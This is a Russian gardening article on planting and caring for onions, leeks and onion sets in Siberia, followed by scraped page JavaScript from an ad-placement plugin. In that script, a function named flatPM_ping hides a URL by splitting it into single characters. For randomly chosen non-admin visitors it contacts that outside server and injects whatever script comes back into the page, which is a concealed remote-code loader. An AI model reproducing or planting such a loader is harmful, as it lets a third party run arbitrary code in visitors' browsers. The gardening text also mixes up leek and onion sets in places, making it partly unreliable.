Метод посадки лука в Сибирских регионах не имеет особых отличий, самое важное – это соблюсти сроки. Место следует выбирать солнечное, хорошо освещенное и проветриваемое. Для лучшего роста лука к растениям следует открыть доступ воздуха. Грядку надо вскопать на глубину 15 см, после формируют ряды и лунки. Под лук севок делают ряды, выдерживая интервал в 20 см, а промежуток между луковичками не должен превышать 10 см. Удобрения вносятся из расчета 30 г. на квадратный метр. Используются зола, сульфат калия и суперфосфат.

Обратите внимание. Глубина посадки должна выдерживаться не более 4 см. Но при осеннем посеве можно увеличить до 7 см. После укладки луковиц в лунки их засыпают землей, а сверху древесными опилками. Также используется солома. Всходы будут через пару недель, а скороспелые сорта дадут урожай через 1,5 недели.

При посадке семян борозды должны располагаться на расстоянии 15 см, а сами семена – на 2 см друг от друга. Семена закладывают на 2 см вглубь. Сроки посева такие же, как и для лука севка. Но всходов стоит ожидать не раньше, чем через три недели. Выращивают на зелень.

Уход за луком

Вначале требуется только полив, а когда появятся первые 4 листка, производят подкормку. Удобрение для нее готовят так: вода – 10 л, мочевина – 15 г., суперфосфат двойной – 20 г., древесная зола – 20 г. При необходимости золу можно заменить калийной солью в том же количестве. Для начальной подкормки также есть в продаже удобрение комбинированного типа – нитрофоска.

Спустя месяц луку потребуется еще одна подкормка. Рекомендуют использовать такое удобрение: вода – 10 л, двойной суперфосфат – 20 г., калийная соль – 20 г. Для этой подкормки также можно купить комбинированное удобрение диаммофоска. Органические удобрения не рекомендуют применять, так как не вырастет крупная репка. Если цель посадки – зелень, то допускается подкормка компостом. Своевременный уход поможет предупредить болезни, которым наиболее подвержен лук: мучнистая роса, прикорневая гниль.

Полив производится раз или два в неделю, но только в первый месяц. Также не стоит забывать об аккуратном рыхлении почвы и прополке. После вполне достаточно будет 1 поливки в период 2 недели. В жаркое и сухое лето придется поливать чуть чаще. Перестают увлажнять почву за месяц до снятия урожая.

Важно! При слишком обильном поливе лук начинает гнить.

Выкапывают лук в период, когда дожди не идут, и на улице сухо. Затем необходима просушка несколько дней на солнце. При выращивании луковиц при помощи семян они хранятся в прохладном, хорошо проветриваемом помещении до весны, чтобы потом высадить их в грунт.

При ответственном отношении и правильном уходе даже в холодном сибирском климате, возможно, получать рекордные урожаи овощных культур.

Посадка и выращивание лука в Сибири

Лук — порей (жемчужный) — культивируемое растение, которое выращивают во всем мире. На территории Западной Сибири, правильная посадка, уход за луком и выращивание играет большую роль. Так как не все сорта подходят к холодному климату Западной Сибири.

Из-за холодного климата не все сорта лука порея подходят для выращивания в Сибири

Выращивание этой культуры следует начинать с подготовки семян. Они могут всходить на протяжении 3 лет. После подготовки, семена необходимо протравить. Это делают перед началом посадки. Помещают их в воду с температурой 45 С, а потом перекладывают в холодную. Чтоб ускорить проращивание семян их следует положить во влажную салфетку и оставить в тёплом месте на несколько дней. Потом их подсушивают так чтоб они отделялись друг от друга и высевают. Эти методы применяются для семян, которые сеют на своем участке. Подготавливать покупные семена не надо, они уже готовы непосредственно к посеву.

Выращивание рассады

На территории Западной Сибири порей выращивают рассадой, так как это продлевает период вегетации.

Срок, посева рекомендуемый для рассады:

  • середина и конец февраля — посев семян осуществляется в специальные ящики для рассады;
  • со второй половины апреля в остеклённых теплицах;
  • последние дни апреля — на грядке под пленкой.

Если в феврале начинать посев, тогда нужно будет досвечивать рассаду, так как световой день для порея 12 часов. Семена высевают в ящики с отступом между грядками не меньше 5 см, а глубина — до 2 см.

Грядки накрываются плёнкой и ставят в тёплое и освещённое помещение, где температурный режим варьируется от 23 до 25 С. Как только появляются всходы, пленку убирают. Дневная температура должна 17 С, а вечерняя — 12 С.

Для Сибири подходит выращивание порея через рассаду

При таком температурном режиме всходы стоят 7 дней. Далее, дневную температуру увеличивают до 20 С, а ночную — 14 С. Такой температурный режим должен оставаться весь период выращивания рассады. Придерживаться температуры — основное условие. Если температура выше нормы, рассада формирует стрелку, которая должна появляться на второй год. По истечении месяца всходы прореживают и оставляют расстояние между ними в 3 см. Пикировать рассаду нет необходимости, если ее выращивают в торфе.

Листья порея подрезают до высоты 8–10 см. Это следует делать раз в 14 дней, чтоб корни лучше росли и стебель утолщался. Рассада лука растет медленно. Когда достигает 8 недель, стебель становиться 1 см в диаметре и появляются листья это говорит о том, что можно начинать высадку.

Высадка

Чтоб вырастить порей осенью, необходимо на грядки внести 6 кг компоста на один квадратный метр земли. В весенний период подсыпать перегной. Перекапывать грядку нельзя.

Порей хорошо высаживать где ранее росли:

  • картошка;
  • огурцы;
  • томатные или бобовые культуры.

В мае высаживается сама рассада порея. Глубина ямок должна составлять 13 см. На дно лунок засыпается навоз. Лук-порей высаживается по одному на лунку. Выращивать порей следует на нешироких грядках.

Если ряды получились большие, то между ними можно высадить сельдерей. Они отлично приживаются в паре.

Высадка порея осуществляется по одному в довольно глубокие ямки

Лук-порей привередливая культура и уход за ним особенный. Он требует постоянной влаги, подкормки и окучивания. Когда стебли достегают 1 см, в лунку досыпается земля. Чтоб получить белый длинный стебель, лук, необходимо окучивать раз в 14 дней. За один сезон окучивать не меньше 4 раз. Это делают в период полива. В первую половину периода вегетации лук необходимо обильно поливать и добавлять подкормки. Отлично подойдет птичий помёт.

Если правильно ухаживать, то стебель вырастает длиной в 50 см и 4 см в толщину. Лук-порей устойчив к морозам, потому вырастить его в Западной Сибири несложно. Если в летний сезон идут дожди с холодами, то у лука-порей формируется короткий и тонкий стебель. При выращивании озимых сортов, порей выдерживает заморозки, но вегетационный период у него продолжается и рост не заканчивается.

Потому рекомендуют подобные сорта выращивать в теплицах. Если лук растет не в теплице, то его придется пересадить в ящики и перенести в теплое помещение. Пересадку можно делать в осенний период, перед первыми морозами. Вырастить лук-порей несложная работа, но требующая постоянного и правильного ухода.

Стебли порея могут достигать полуметровой длины при условии правильного ухода

Подготовка севка к посадке

Прежде чем садить лук — севок его прогревают длительный период. Эта процедура необходима, чтоб луковицы не пускали стрелку перед началом посадки. В коробку небольшим слоем насыпается севок и оставляется на месяц. Лук должен поморится. Прежде чем садить севок, его перебирают по размерам:

  • Луковицы от 1 см сажают раньше, они не пускают стрелку.
  • Севок до 2 см сажают позже.
  • Крупный севок — 2 см. Его посадка нужна для получения зелени.

Маленькие луковицы сажать лучше зимой. К этому моменту они полностью подсохнут. Попадаются и очень подсохшие луковицы. Их следует замочить в воде на двое суток и добавить 200 гр золы. Лук наберет влагу и можно садить, как обыкновенный севок.

Чтоб предупредить луковые болезни, севок на день оставляют в растворе марганцовки. Далее, высушивают и севок готов к посадке.

Посадка севка в различных регионах зависит от климата. Если грунт холодный, севок начнет сразу пускать стрелку, а в сухой тяжело будет пустить корни. Западная Сибирь и её климатические условия позволяют высаживать севок в первый дни мая, когда почва прогревается до 12 С. Отличным ориентиром, для посадки севка послужит цветение черемухи или крокусов.

Цветение крокусов — природный ориентир для посадки севка порея

Посадка и уход за севком в весенний период

Севок для посадки должен быть подготовлен. Земля в которую севок будут сажать нужна плодородная и рыхлая. Садить севок, необходимо на солнечной части земли или в полутени. Если посадить в тени, луковица не станет формироваться.

Садить севок надо в земле, где раньше росли помидоры, бобовые культуры. Можно посадить в одну грядку с морковью. Они будут оберегать друг друга от вредителей. Тогда грядки делать с отступом 20 см. Сажать следует маленькие луковицы с отступом в 5 см друг от дружки, средние — 10 см. Правильно высаживать севок дном вниз на высоту равную самой луковице, но следует оставить несколько сантиметров, которые засыпаются перегноем. Через 7 дней лук даст зеленые стрелки, а через 20 — надо подкормить.

Для этого используют настой крапивы или перегной. Когда луковка наберёт вес, её верхушка будет над землей. Когда пойдет рост, грядки поливают дважды в неделю. После дождя, достаточно одного полива в неделю. В июле луковицы созревают и не нуждаются в частом поливе, а за 14 дней до сбора их вовсе перестаю поливать.

Арзамасский порей дает отличный крепкий стебель

Лучшие сорта однолетки лука для выращивания в Западной Сибири подойдут:

  • Арзамасский и Бессоновский местные;
  • Стригуновский;
  • Сибирский.

Сибирский сорт имеет жёлтый окрас с розовым оттенком. Луковицы этого сорта округло-плоские, а внутренняя чешуя белая и мясистая. По вкусовым качествам — полуострый. Вес от 30 гр до 60 гр.

Сорт Бессоновский местный имеет округло-плоскую форму. Даёт хороший урожай и долго хранится. По вкусу — острый. Этот сорт скороспелый с весом луковиц от 35 до 65 гр.

Сорт Стригуновский с округлой формой луковиц и весом от 45 до 100 гр. Имеет жёлтый окрас. Привередлив при выращивании. Нуждается в постоянном поливе в первой половине вегетационного периода.

Сорт Арзамасский местный имеет темно-жёлтый окрас. Луковицы достигают веса от 30 до 90 гр, плотные и долго хранятся. По вкусу — острый.

При правильном посеве и уходе за луком, можно получить хороший урожай не только сортов однолеток, но и сортов, которые не самые распространённые на территории Западной Сибири.

Запись Посадка и выращивание лука в Сибири впервые появилась SeloMoe.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};